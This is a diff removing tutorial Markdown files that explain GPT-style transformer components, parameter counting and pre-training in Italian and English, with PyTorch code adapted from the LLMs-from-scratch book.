-attn_weights = self.dropout(attn_weights)
-
-# Shape: (b, num_tokens, num_heads, head_dim)
-context_vec = (attn_weights @ values).transpose(1, 2)
-
-# Combine heads, where self.d_out = self.num_heads * self.head_dim
-context_vec = context_vec.contiguous().view(b, num_tokens, self.d_out)
-context_vec = self.out_proj(context_vec) # optional projection
-
-return context_vec
-
-class LayerNorm(nn.Module):
-def __init__(self, emb_dim):
-super().__init__()
-self.eps = 1e-5
-self.scale = nn.Parameter(torch.ones(emb_dim))
-self.shift = nn.Parameter(torch.zeros(emb_dim))
-
-def forward(self, x):
-mean = x.mean(dim=-1, keepdim=True)
-var = x.var(dim=-1, keepdim=True, unbiased=False)
-norm_x = (x - mean) / torch.sqrt(var + self.eps)
-return self.scale * norm_x + self.shift
-
-class TransformerBlock(nn.Module):
-def __init__(self, cfg):
-super().__init__()
-self.att = MultiHeadAttention(
-d_in=cfg["emb_dim"],
-d_out=cfg["emb_dim"],
-context_length=cfg["context_length"],
-num_heads=cfg["n_heads"],
-dropout=cfg["drop_rate"],
-qkv_bias=cfg["qkv_bias"])
-self.ff = FeedForward(cfg)
-self.norm1 = LayerNorm(cfg["emb_dim"])
-self.norm2 = LayerNorm(cfg["emb_dim"])
-self.drop_shortcut = nn.Dropout(cfg["drop_rate"])
-
-def forward(self, x):
-# Shortcut connection for attention block
-shortcut = x
-x = self.norm1(x)
-x = self.att(x)  # Shape [batch_size, num_tokens, emb_size]
-x = self.drop_shortcut(x)
-x = x + shortcut  # Add the original input back
-
-# Shortcut connection for feed forward block
-shortcut = x
-x = self.norm2(x)
-x = self.ff(x)
-x = self.drop_shortcut(x)
-x = x + shortcut  # Add the original input back
-
-return x
-
-
-class GPTModel(nn.Module):
-def __init__(self, cfg):
-super().__init__()
-self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"])
-self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"])
-self.drop_emb = nn.Dropout(cfg["drop_rate"])
-
-self.trf_blocks = nn.Sequential(
-*[TransformerBlock(cfg) for _ in range(cfg["n_layers"])])
-
-self.final_norm = LayerNorm(cfg["emb_dim"])
-self.out_head = nn.Linear(
-cfg["emb_dim"], cfg["vocab_size"], bias=False
-)
-
-def forward(self, in_idx):
-batch_size, seq_len = in_idx.shape
-tok_embeds = self.tok_emb(in_idx)
-pos_embeds = self.pos_emb(torch.arange(seq_len, device=in_idx.device))
-x = tok_embeds + pos_embeds  # Shape [batch_size, num_tokens, emb_size]
-x = self.drop_emb(x)
-x = self.trf_blocks(x)
-x = self.final_norm(x)
-logits = self.out_head(x)
-return logits
-
-GPT_CONFIG_124M = {
-"vocab_size": 50257,    # Vocabulary size
-"context_length": 1024, # Context length
-"emb_dim": 768,         # Embedding dimension
-"n_heads": 12,          # Number of attention heads
-"n_layers": 12,         # Number of layers
-"drop_rate": 0.1,       # Dropout rate
-"qkv_bias": False       # Query-Key-Value bias
-}
-
-torch.manual_seed(123)
-model = GPTModel(GPT_CONFIG_124M)
-out = model(batch)
-print("Input batch:\n", batch)
-print("\nOutput shape:", out.shape)
-print(out)
-```
-### **Funzione di Attivazione GELU**
-```python
-# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
-class GELU(nn.Module):
-def __init__(self):
-super().__init__()
-
-def forward(self, x):
-return 0.5 * x * (1 + torch.tanh(
-torch.sqrt(torch.tensor(2.0 / torch.pi)) *
-(x + 0.044715 * torch.pow(x, 3))
-))
-```
-#### **Scopo e Funzionalità**
-
- **GELU (Gaussian Error Linear Unit):** Una funzione di attivazione che introduce non linearità nel modello.
- **Attivazione Liscia:** A differenza di ReLU, che annulla gli input negativi, GELU mappa gli input agli output in modo fluido, consentendo valori piccoli e diversi da zero per gli input negativi.
- **Definizione Matematica:**
-
-<figure><img src="../../images/image (2) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
-
-> [!NOTE]
-> L'obiettivo dell'uso di questa funzione dopo i livelli lineari all'interno del livello FeedForward è cambiare i dati lineari in dati non lineari per consentire al modello di apprendere relazioni complesse e non lineari.
-
-### **Rete Neurale FeedForward**
-
-_Le forme sono state aggiunte come commenti per comprendere meglio le forme delle matrici:_
-```python
-# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
-class FeedForward(nn.Module):
-def __init__(self, cfg):
-super().__init__()
-self.layers = nn.Sequential(
-nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]),
-GELU(),
-nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]),
-)
-
-def forward(self, x):
-# x shape: (batch_size, seq_len, emb_dim)
-
-x = self.layers[0](x)# x shape: (batch_size, seq_len, 4 * emb_dim)
-x = self.layers[1](x) # x shape remains: (batch_size, seq_len, 4 * emb_dim)
-x = self.layers[2](x) # x shape: (batch_size, seq_len, emb_dim)
-return x  # Output shape: (batch_size, seq_len, emb_dim)
-```
-#### **Scopo e Funzionalità**
-
- **Rete FeedForward a livello di posizione:** Applica una rete completamente connessa a due strati a ciascuna posizione separatamente e in modo identico.
- **Dettagli del livello:**
- **Primo Livello Lineare:** Espande la dimensionalità da `emb_dim` a `4 * emb_dim`.
- **Attivazione GELU:** Applica non linearità.
- **Secondo Livello Lineare:** Riduce la dimensionalità di nuovo a `emb_dim`.
-
-> [!NOTE]
-> Come puoi vedere, la rete Feed Forward utilizza 3 strati. Il primo è uno strato lineare che moltiplicherà le dimensioni per 4 utilizzando pesi lineari (parametri da addestrare all'interno del modello). Poi, la funzione GELU è utilizzata in tutte quelle dimensioni per applicare variazioni non lineari per catturare rappresentazioni più ricche e infine un altro strato lineare è utilizzato per tornare alla dimensione originale.
-
-### **Meccanismo di Attenzione Multi-Testa**
-
-Questo è già stato spiegato in una sezione precedente.
-
-#### **Scopo e Funzionalità**
-
- **Auto-Attenzione Multi-Testa:** Consente al modello di concentrarsi su diverse posizioni all'interno della sequenza di input durante la codifica di un token.
- **Componenti Chiave:**
- **Query, Chiavi, Valori:** Proiezioni lineari dell'input, utilizzate per calcolare i punteggi di attenzione.
- **Teste:** Molteplici meccanismi di attenzione che funzionano in parallelo (`num_heads`), ciascuno con una dimensione ridotta (`head_dim`).
- **Punteggi di Attenzione:** Calcolati come il prodotto scalare di query e chiavi, scalati e mascherati.
- **Mascheramento:** Viene applicata una maschera causale per impedire al modello di prestare attenzione ai token futuri (importante per modelli autoregressivi come GPT).
- **Pesi di Attenzione:** Softmax dei punteggi di attenzione mascherati e scalati.
- **Vettore di Contesto:** Somma pesata dei valori, secondo i pesi di attenzione.
- **Proiezione di Uscita:** Strato lineare per combinare le uscite di tutte le teste.
-
-> [!NOTE]
-> L'obiettivo di questa rete è trovare le relazioni tra i token nello stesso contesto. Inoltre, i token sono divisi in diverse teste per prevenire l'overfitting anche se le relazioni finali trovate per testa sono combinate alla fine di questa rete.
->
-> Inoltre, durante l'addestramento viene applicata una **maschera causale** in modo che i token successivi non vengano presi in considerazione quando si cercano le relazioni specifiche a un token e viene applicato anche un **dropout** per **prevenire l'overfitting**.
-
-### **Normalizzazione** del Livello
-```python
-# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
-class LayerNorm(nn.Module):
-def __init__(self, emb_dim):
-super().__init__()
-self.eps = 1e-5 # Prevent division by zero during normalization.
-self.scale = nn.Parameter(torch.ones(emb_dim))
-self.shift = nn.Parameter(torch.zeros(emb_dim))
-
-def forward(self, x):
-mean = x.mean(dim=-1, keepdim=True)
-var = x.var(dim=-1, keepdim=True, unbiased=False)
-norm_x = (x - mean) / torch.sqrt(var + self.eps)
-return self.scale * norm_x + self.shift
-```
-#### **Scopo e Funzionalità**
-
- **Layer Normalization:** Una tecnica utilizzata per normalizzare gli input attraverso le caratteristiche (dimensioni di embedding) per ciascun esempio individuale in un batch.
- **Componenti:**
- **`eps`:** Una piccola costante (`1e-5`) aggiunta alla varianza per prevenire la divisione per zero durante la normalizzazione.
- **`scale` e `shift`:** Parametri apprendibili (`nn.Parameter`) che consentono al modello di scalare e spostare l'output normalizzato. Sono inizializzati a uno e zero, rispettivamente.
- **Processo di Normalizzazione:**
- **Calcola Media (`mean`):** Calcola la media dell'input `x` attraverso la dimensione di embedding (`dim=-1`), mantenendo la dimensione per il broadcasting (`keepdim=True`).
- **Calcola Varianza (`var`):** Calcola la varianza di `x` attraverso la dimensione di embedding, mantenendo anch'essa la dimensione. Il parametro `unbiased=False` garantisce che la varianza venga calcolata utilizzando l'estimatore biased (dividendo per `N` invece di `N-1`), che è appropriato quando si normalizza sulle caratteristiche piuttosto che sui campioni.
- **Normalizza (`norm_x`):** Sottrae la media da `x` e divide per la radice quadrata della varianza più `eps`.
- **Scala e Sposta:** Applica i parametri apprendibili `scale` e `shift` all'output normalizzato.
-
-> [!NOTE]
-> L'obiettivo è garantire una media di 0 con una varianza di 1 attraverso tutte le dimensioni dello stesso token. L'obiettivo di questo è **stabilizzare l'addestramento delle reti neurali profonde** riducendo il cambiamento interno della covariata, che si riferisce al cambiamento nella distribuzione delle attivazioni della rete a causa dell'aggiornamento dei parametri durante l'addestramento.
-
-### **Blocco Transformer**
-
-_Sono state aggiunte forme come commenti per comprendere meglio le forme delle matrici:_
-```python
-# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
-
-class TransformerBlock(nn.Module):
-def __init__(self, cfg):
-super().__init__()
-self.att = MultiHeadAttention(
-d_in=cfg["emb_dim"],
-d_out=cfg["emb_dim"],
-context_length=cfg["context_length"],
-num_heads=cfg["n_heads"],
-dropout=cfg["drop_rate"],
-qkv_bias=cfg["qkv_bias"]
-)
-self.ff = FeedForward(cfg)
-self.norm1 = LayerNorm(cfg["emb_dim"])
-self.norm2 = LayerNorm(cfg["emb_dim"])
-self.drop_shortcut = nn.Dropout(cfg["drop_rate"])
-
-def forward(self, x):
-# x shape: (batch_size, seq_len, emb_dim)
-
-# Shortcut connection for attention block
-shortcut = x  # shape: (batch_size, seq_len, emb_dim)
-x = self.norm1(x)  # shape remains (batch_size, seq_len, emb_dim)
-x = self.att(x)    # shape: (batch_size, seq_len, emb_dim)
-x = self.drop_shortcut(x)  # shape remains (batch_size, seq_len, emb_dim)
-x = x + shortcut   # shape: (batch_size, seq_len, emb_dim)
-
-# Shortcut connection for feedforward block
-shortcut = x       # shape: (batch_size, seq_len, emb_dim)
-x = self.norm2(x)  # shape remains (batch_size, seq_len, emb_dim)
-x = self.ff(x)     # shape: (batch_size, seq_len, emb_dim)
-x = self.drop_shortcut(x)  # shape remains (batch_size, seq_len, emb_dim)
-x = x + shortcut   # shape: (batch_size, seq_len, emb_dim)
-
-return x  # Output shape: (batch_size, seq_len, emb_dim)
-
-```
-#### **Scopo e Funzionalità**
-
- **Composizione dei Livelli:** Combina attenzione multi-testa, rete feedforward, normalizzazione dei livelli e connessioni residue.
- **Normalizzazione dei Livelli:** Applicata prima dei livelli di attenzione e feedforward per un addestramento stabile.
- **Connessioni Residue (Scorciatoie):** Aggiungono l'input di un livello alla sua uscita per migliorare il flusso del gradiente e abilitare l'addestramento di reti profonde.
- **Dropout:** Applicato dopo i livelli di attenzione e feedforward per la regolarizzazione.
-
-#### **Funzionalità Passo-Passo**
-
-1. **Primo Percorso Residuo (Auto-Attenzione):**
- **Input (`shortcut`):** Salva l'input originale per la connessione residua.
- **Layer Norm (`norm1`):** Normalizza l'input.
- **Multi-Head Attention (`att`):** Applica auto-attenzione.
- **Dropout (`drop_shortcut`):** Applica dropout per la regolarizzazione.
- **Aggiungi Residuo (`x + shortcut`):** Combina con l'input originale.
-2. **Secondo Percorso Residuo (FeedForward):**
- **Input (`shortcut`):** Salva l'input aggiornato per la prossima connessione residua.
- **Layer Norm (`norm2`):** Normalizza l'input.
- **FeedForward Network (`ff`):** Applica la trasformazione feedforward.
- **Dropout (`drop_shortcut`):** Applica dropout.
- **Aggiungi Residuo (`x + shortcut`):** Combina con l'input del primo percorso residuo.
-
-> [!NOTE]
-> Il blocco transformer raggruppa tutte le reti insieme e applica alcune **normalizzazioni** e **dropout** per migliorare la stabilità e i risultati dell'addestramento.\
-> Nota come i dropout vengano effettuati dopo l'uso di ciascuna rete mentre la normalizzazione è applicata prima.
->
-> Inoltre, utilizza anche scorciatoie che consistono nell'**aggiungere l'uscita di una rete con il suo input**. Questo aiuta a prevenire il problema del gradiente che svanisce assicurando che i livelli iniziali contribuiscano "tanto" quanto quelli finali.
-
-### **GPTModel**
-
-_Sono state aggiunte forme come commenti per comprendere meglio le forme delle matrici:_
-```python
-# From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
-class GPTModel(nn.Module):
-def __init__(self, cfg):
-super().__init__()
-self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"])
-# shape: (vocab_size, emb_dim)
-
-self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"])
-# shape: (context_length, emb_dim)
-
-self.drop_emb = nn.Dropout(cfg["drop_rate"])
-
-self.trf_blocks = nn.Sequential(
-*[TransformerBlock(cfg) for _ in range(cfg["n_layers"])]
-)
-# Stack of TransformerBlocks
-
-self.final_norm = LayerNorm(cfg["emb_dim"])
-self.out_head = nn.Linear(cfg["emb_dim"], cfg["vocab_size"], bias=False)
-# shape: (emb_dim, vocab_size)
-
-def forward(self, in_idx):
-# in_idx shape: (batch_size, seq_len)
-batch_size, seq_len = in_idx.shape
-
-# Token embeddings
-tok_embeds = self.tok_emb(in_idx)
-# shape: (batch_size, seq_len, emb_dim)
-
-# Positional embeddings
-pos_indices = torch.arange(seq_len, device=in_idx.device)
-# shape: (seq_len,)
-pos_embeds = self.pos_emb(pos_indices)
-# shape: (seq_len, emb_dim)
-
-# Add token and positional embeddings
-x = tok_embeds + pos_embeds  # Broadcasting over batch dimension
-# x shape: (batch_size, seq_len, emb_dim)
-
-x = self.drop_emb(x)  # Dropout applied
-# x shape remains: (batch_size, seq_len, emb_dim)
-
-x = self.trf_blocks(x)  # Pass through Transformer blocks
-# x shape remains: (batch_size, seq_len, emb_dim)
-
-x = self.final_norm(x)  # Final LayerNorm
-# x shape remains: (batch_size, seq_len, emb_dim)
-
-logits = self.out_head(x)  # Project to vocabulary size
-# logits shape: (batch_size, seq_len, vocab_size)
-
-return logits  # Output shape: (batch_size, seq_len, vocab_size)
-```
-#### **Scopo e Funzionalità**
-
- **Strati di Embedding:**
- **Token Embeddings (`tok_emb`):** Converte gli indici dei token in embedding. Come promemoria, questi sono i pesi dati a ciascuna dimensione di ciascun token nel vocabolario.
- **Positional Embeddings (`pos_emb`):** Aggiunge informazioni posizionali agli embedding per catturare l'ordine dei token. Come promemoria, questi sono i pesi dati ai token in base alla loro posizione nel testo.
- **Dropout (`drop_emb`):** Applicato agli embedding per la regolarizzazione.
- **Transformer Blocks (`trf_blocks`):** Stack di `n_layers` blocchi transformer per elaborare gli embedding.
- **Normalizzazione Finale (`final_norm`):** Normalizzazione dello strato prima dello strato di output.
- **Output Layer (`out_head`):** Proietta gli stati nascosti finali alla dimensione del vocabolario per produrre logits per la previsione.
-
-> [!NOTE]
-> L'obiettivo di questa classe è utilizzare tutte le altre reti menzionate per **prevedere il prossimo token in una sequenza**, fondamentale per compiti come la generazione di testo.
->
-> Nota come utilizzerà **tanti blocchi transformer quanto indicato** e che ogni blocco transformer utilizza una rete di attivazione multi-testa, una rete feed forward e diverse normalizzazioni. Quindi, se vengono utilizzati 12 blocchi transformer, moltiplica questo per 12.
->
-> Inoltre, uno strato di **normalizzazione** è aggiunto **prima** dell'**output** e uno strato lineare finale è applicato alla fine per ottenere i risultati con le dimensioni appropriate. Nota come ogni vettore finale abbia la dimensione del vocabolario utilizzato. Questo perché sta cercando di ottenere una probabilità per ogni possibile token all'interno del vocabolario.
-
-## Numero di Parametri da addestrare
-
-Avendo definita la struttura GPT, è possibile scoprire il numero di parametri da addestrare:
-```python
-GPT_CONFIG_124M = {
-"vocab_size": 50257,    # Vocabulary size
-"context_length": 1024, # Context length
-"emb_dim": 768,         # Embedding dimension
-"n_heads": 12,          # Number of attention heads
-"n_layers": 12,         # Number of layers
-"drop_rate": 0.1,       # Dropout rate
-"qkv_bias": False       # Query-Key-Value bias
-}
-
-model = GPTModel(GPT_CONFIG_124M)
-total_params = sum(p.numel() for p in model.parameters())
-print(f"Total number of parameters: {total_params:,}")
-# Total number of parameters: 163,009,536
-```
-### **Calcolo Passo-Passo**
-
-#### **1. Strati di Embedding: Token Embedding & Position Embedding**
-
- **Strato:** `nn.Embedding(vocab_size, emb_dim)`
- **Parametri:** `vocab_size * emb_dim`
-```python
-token_embedding_params = 50257 * 768 = 38,597,376
-```
- **Layer:** `nn.Embedding(context_length, emb_dim)`
- **Parameters:** `context_length * emb_dim`
-```python
-position_embedding_params = 1024 * 768 = 786,432
-```
-**Parametri di Embedding Totali**
-```python
-embedding_params = token_embedding_params + position_embedding_params
-embedding_params = 38,597,376 + 786,432 = 39,383,808
-```
-#### **2. Blocchi Transformer**
-
-Ci sono 12 blocchi transformer, quindi calcoleremo i parametri per un blocco e poi moltiplicheremo per 12.
-
-**Parametri per Blocchi Transformer**
-
-**a. Attenzione Multi-Testa**
-
- **Componenti:**
- **Strato Lineare Query (`W_query`):** `nn.Linear(emb_dim, emb_dim, bias=False)`
- **Strato Lineare Chiave (`W_key`):** `nn.Linear(emb_dim, emb_dim, bias=False)`
- **Strato Lineare Valore (`W_value`):** `nn.Linear(emb_dim, emb_dim, bias=False)`
- **Proiezione di Uscita (`out_proj`):** `nn.Linear(emb_dim, emb_dim)`
- **Calcoli:**
-
- **Ognuno di `W_query`, `W_key`, `W_value`:**
-
-```python
-qkv_params = emb_dim * emb_dim = 768 * 768 = 589,824
-```
-
-Poiché ci sono tre di questi strati:
-
-```python
-total_qkv_params = 3 * qkv_params = 3 * 589,824 = 1,769,472
-```
-
- **Proiezione di Uscita (`out_proj`):**
-
-```python
-out_proj_params = (emb_dim * emb_dim) + emb_dim = (768 * 768) + 768 = 589,824 + 768 = 590,592
-```
-
- **Parametri Totali di Attenzione Multi-Testa:**
-
-```python
-mha_params = total_qkv_params + out_proj_params
-mha_params = 1,769,472 + 590,592 = 2,360,064
-```
-
-**b. Rete FeedForward**
-
- **Componenti:**
- **Primo Strato Lineare:** `nn.Linear(emb_dim, 4 * emb_dim)`
- **Secondo Strato Lineare:** `nn.Linear(4 * emb_dim, emb_dim)`
- **Calcoli:**
-
- **Primo Strato Lineare:**
-
-```python
-ff_first_layer_params = (emb_dim * 4 * emb_dim) + (4 * emb_dim)
-ff_first_layer_params = (768 * 3072) + 3072 = 2,359,296 + 3,072 = 2,362,368
-```
-
- **Secondo Strato Lineare:**
-
-```python
-ff_second_layer_params = (4 * emb_dim * emb_dim) + emb_dim
-ff_second_layer_params = (3072 * 768) + 768 = 2,359,296 + 768 = 2,360,064
-```
-
- **Parametri Totali FeedForward:**
-
-```python
-ff_params = ff_first_layer_params + ff_second_layer_params
-ff_params = 2,362,368 + 2,360,064 = 4,722,432
-```
-
-**c. Normalizzazioni dei Livelli**
-
- **Componenti:**
- Due istanze di `LayerNorm` per blocco.
- Ogni `LayerNorm` ha `2 * emb_dim` parametri (scala e traslazione).
- **Calcoli:**
-
-```python
-layer_norm_params_per_block = 2 * (2 * emb_dim) = 2 * 768 * 2 = 3,072
-```
-
-**d. Parametri Totali per Blocco Transformer**
-```python
-pythonCopy codeparams_per_block = mha_params + ff_params + layer_norm_params_per_block
-params_per_block = 2,360,064 + 4,722,432 + 3,072 = 7,085,568
-```
-**Parametri Totali per Tutti i Blocchi Trasformatori**
-```python
-pythonCopy codetotal_transformer_blocks_params = params_per_block * n_layers
-total_transformer_blocks_params = 7,085,568 * 12 = 85,026,816
-```
-#### **3. Livelli Finali**
-
-**a. Normalizzazione del Livello Finale**
-
- **Parametri:** `2 * emb_dim` (scala e traslazione)
-```python
-pythonCopy codefinal_layer_norm_params = 2 * 768 = 1,536
-```
-**b. Strato di Proiezione dell'Uscita (`out_head`)**
-
- **Strato:** `nn.Linear(emb_dim, vocab_size, bias=False)`
- **Parametri:** `emb_dim * vocab_size`
-```python
-pythonCopy codeoutput_projection_params = 768 * 50257 = 38,597,376
-```
-#### **4. Riepilogando Tutti i Parametri**
-```python
-pythonCopy codetotal_params = (
-embedding_params +
-total_transformer_blocks_params +
-final_layer_norm_params +
-output_projection_params
-)
-total_params = (
-39,383,808 +
-85,026,816 +
-1,536 +
-38,597,376
-)
-total_params = 163,009,536
-```
-## Genera Testo
-
-Avendo un modello che prevede il token successivo come quello precedente, è sufficiente prendere i valori dell'ultimo token dall'output (poiché saranno quelli del token previsto), che saranno un **valore per voce nel vocabolario** e poi utilizzare la funzione `softmax` per normalizzare le dimensioni in probabilità che sommano 1 e poi ottenere l'indice della voce più grande, che sarà l'indice della parola all'interno del vocabolario.
-
-Codice da [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb):
-```python
-def generate_text_simple(model, idx, max_new_tokens, context_size):
-# idx is (batch, n_tokens) array of indices in the current context
-for _ in range(max_new_tokens):
-
-# Crop current context if it exceeds the supported context size
-# E.g., if LLM supports only 5 tokens, and the context size is 10
-# then only the last 5 tokens are used as context
-idx_cond = idx[:, -context_size:]
-
-# Get the predictions
-with torch.no_grad():
-logits = model(idx_cond)
-
-# Focus only on the last time step
-# (batch, n_tokens, vocab_size) becomes (batch, vocab_size)
-logits = logits[:, -1, :]
-
-# Apply softmax to get probabilities
-probas = torch.softmax(logits, dim=-1)  # (batch, vocab_size)
-
-# Get the idx of the vocab entry with the highest probability value
-idx_next = torch.argmax(probas, dim=-1, keepdim=True)  # (batch, 1)
-
-# Append sampled index to the running sequence
-idx = torch.cat((idx, idx_next), dim=1)  # (batch, n_tokens+1)
-
-return idx
-
-
-start_context = "Hello, I am"
-
-encoded = tokenizer.encode(start_context)
-print("encoded:", encoded)
-
-encoded_tensor = torch.tensor(encoded).unsqueeze(0)
-print("encoded_tensor.shape:", encoded_tensor.shape)
-
-model.eval() # disable dropout
-
-out = generate_text_simple(
-model=model,
-idx=encoded_tensor,
-max_new_tokens=6,
-context_size=GPT_CONFIG_124M["context_length"]
-)
-
-print("Output:", out)
-print("Output length:", len(out[0]))
-```
-## Riferimenti
-
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
--- a/src/todo/llm-training-data-preparation/6.-pre-training-and-loading-models.md
+++ b/src/todo/llm-training-data-preparation/6.-pre-training-and-loading-models.md
@ -1,970 +0,0 @@
-# 6. Pre-training & Loading models
-
-## Text Generation
-
-In order to train a model we will need that model to be able to generate new tokens. Then we will compare the generated tokens with the expected ones in order to train the model into **learning the tokens it needs to generate**.
-
-As in the previous examples we already predicted some tokens, it's possible to reuse that function for this purpose.
-
-> [!TIP]
-> The goal of this sixth phase is very simple: **Train the model from scratch**. For this the previous LLM architecture will be used with some loops going over the data sets using the defined loss functions and optimizer to train all the parameters of the model.
-
-## Text Evaluation
-
-In order to perform a correct training it's needed to measure check the predictions obtained for the expected token. The goal of the training is to maximize the likelihood of the correct token, which involves increasing its probability relative to other tokens.
-
-In order to maximize the probability of the correct token, the weights of the model must be modified to that probability is maximised. The updates of the weights is done via **backpropagation**. This requires a **loss function to maximize**. In this case, the function will be the **difference between the performed prediction and the desired one**.
-
-However, instead of working with the raw predictions, it will work with a logarithm with base n. So if the current prediction of the expected token was 7.4541e-05, the natural logarithm (base *e*) of **7.4541e-05** is approximately **-9.5042**.\
-Then, for each entry with a context length of 5 tokens for example, the model will need to predict 5 tokens, being the first 4 tokens the last one of the input and the fifth the predicted one. Therefore, for each entry we will have 5 predictions in that case (even if the first 4 ones were in the input the model doesn't know this) with 5 expected token and therefore 5 probabilities to maximize.
-
-Therefore, after performing the natural logarithm to each prediction, the **average** is calculated, the **minus symbol removed** (this is called _cross entropy loss_) and thats the **number to reduce as close to 0 as possible** because the natural logarithm of 1 is 0:
-
-<figure><img src="../../images/image (10) (1).png" alt="" width="563"><figcaption><p><a href="https://camo.githubusercontent.com/3c0ab9c55cefa10b667f1014b6c42df901fa330bb2bc9cea88885e784daec8ba/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830355f636f6d707265737365642f63726f73732d656e74726f70792e776562703f313233">https://camo.githubusercontent.com/3c0ab9c55cefa10b667f1014b6c42df901fa330bb2bc9cea88885e784daec8ba/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830355f636f6d707265737365642f63726f73732d656e74726f70792e776562703f313233</a></p></figcaption></figure>
-
-Another way to measure how good the model is is called perplexity. **Perplexity** is a metric used to evaluate how well a probability model predicts a sample. In language modelling, it represents the **model's uncertainty** when predicting the next token in a sequence.\
-For example, a perplexity value of 48725, means that when needed to predict a token it's unsure about which among 48,725 tokens in the vocabulary is the good one.
-
-## Pre-Train Example
-
-This is the initial code proposed in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/ch05.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/ch05.ipynb) some times slightly modify
-
-<details>
-
-<summary>Previous code used here but already explained in previous sections</summary>
-
-```python
-"""
-This is code explained before so it won't be exaplained
-"""
-
-import tiktoken
-import torch
-import torch.nn as nn
-from torch.utils.data import Dataset, DataLoader
-
-
-class GPTDatasetV1(Dataset):
-    def __init__(self, txt, tokenizer, max_length, stride):
-        self.input_ids = []
-        self.target_ids = []
-
-        # Tokenize the entire text
-        token_ids = tokenizer.encode(txt, allowed_special={"<|endoftext|>"})
-
-        # Use a sliding window to chunk the book into overlapping sequences of max_length
-        for i in range(0, len(token_ids) - max_length, stride):
-            input_chunk = token_ids[i:i + max_length]
-            target_chunk = token_ids[i + 1: i + max_length + 1]
-            self.input_ids.append(torch.tensor(input_chunk))
-            self.target_ids.append(torch.tensor(target_chunk))
-
-    def __len__(self):
-        return len(self.input_ids)
-
-    def __getitem__(self, idx):
-        return self.input_ids[idx], self.target_ids[idx]
-
-
-def create_dataloader_v1(txt, batch_size=4, max_length=256,
-                         stride=128, shuffle=True, drop_last=True, num_workers=0):
-    # Initialize the tokenizer
-    tokenizer = tiktoken.get_encoding("gpt2")
-
-    # Create dataset
-    dataset = GPTDatasetV1(txt, tokenizer, max_length, stride)
-
-    # Create dataloader
-    dataloader = DataLoader(
-        dataset, batch_size=batch_size, shuffle=shuffle, drop_last=drop_last, num_workers=num_workers)
-
-    return dataloader
-
-
-class MultiHeadAttention(nn.Module):
-    def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False):
-        super().__init__()
-        assert d_out % num_heads == 0, "d_out must be divisible by n_heads"
-
-        self.d_out = d_out
-        self.num_heads = num_heads
-        self.head_dim = d_out // num_heads  # Reduce the projection dim to match desired output dim
-
-        self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias)
-        self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias)
-        self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias)
-        self.out_proj = nn.Linear(d_out, d_out)  # Linear layer to combine head outputs
-        self.dropout = nn.Dropout(dropout)
-        self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1))
-
-    def forward(self, x):
-        b, num_tokens, d_in = x.shape
-
-        keys = self.W_key(x)  # Shape: (b, num_tokens, d_out)
-        queries = self.W_query(x)
-        values = self.W_value(x)
-
-        # We implicitly split the matrix by adding a `num_heads` dimension
-        # Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim)
-        keys = keys.view(b, num_tokens, self.num_heads, self.head_dim)
-        values = values.view(b, num_tokens, self.num_heads, self.head_dim)
-        queries = queries.view(b, num_tokens, self.num_heads, self.head_dim)
-
-        # Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim)
-        keys = keys.transpose(1, 2)
-        queries = queries.transpose(1, 2)
-        values = values.transpose(1, 2)
-
-        # Compute scaled dot-product attention (aka self-attention) with a causal mask
-        attn_scores = queries @ keys.transpose(2, 3)  # Dot product for each head
-
-        # Original mask truncated to the number of tokens and converted to boolean
-        mask_bool = self.mask.bool()[:num_tokens, :num_tokens]
-
-        # Use the mask to fill attention scores
-        attn_scores.masked_fill_(mask_bool, -torch.inf)
-
-        attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
-        attn_weights = self.dropout(attn_weights)
-
-        # Shape: (b, num_tokens, num_heads, head_dim)
-        context_vec = (attn_weights @ values).transpose(1, 2)
-
-        # Combine heads, where self.d_out = self.num_heads * self.head_dim
-        context_vec = context_vec.reshape(b, num_tokens, self.d_out)
-        context_vec = self.out_proj(context_vec)  # optional projection
-
-        return context_vec
-
-
-class LayerNorm(nn.Module):
-    def __init__(self, emb_dim):
-        super().__init__()
-        self.eps = 1e-5
-        self.scale = nn.Parameter(torch.ones(emb_dim))
-        self.shift = nn.Parameter(torch.zeros(emb_dim))
-
-    def forward(self, x):
-        mean = x.mean(dim=-1, keepdim=True)
-        var = x.var(dim=-1, keepdim=True, unbiased=False)
-        norm_x = (x - mean) / torch.sqrt(var + self.eps)
-        return self.scale * norm_x + self.shift
-
-
-class GELU(nn.Module):
-    def __init__(self):
-        super().__init__()
-
-    def forward(self, x):
-        return 0.5 * x * (1 + torch.tanh(
-            torch.sqrt(torch.tensor(2.0 / torch.pi)) *
-            (x + 0.044715 * torch.pow(x, 3))
-        ))
-
-
-class FeedForward(nn.Module):
-    def __init__(self, cfg):
-        super().__init__()
-        self.layers = nn.Sequential(
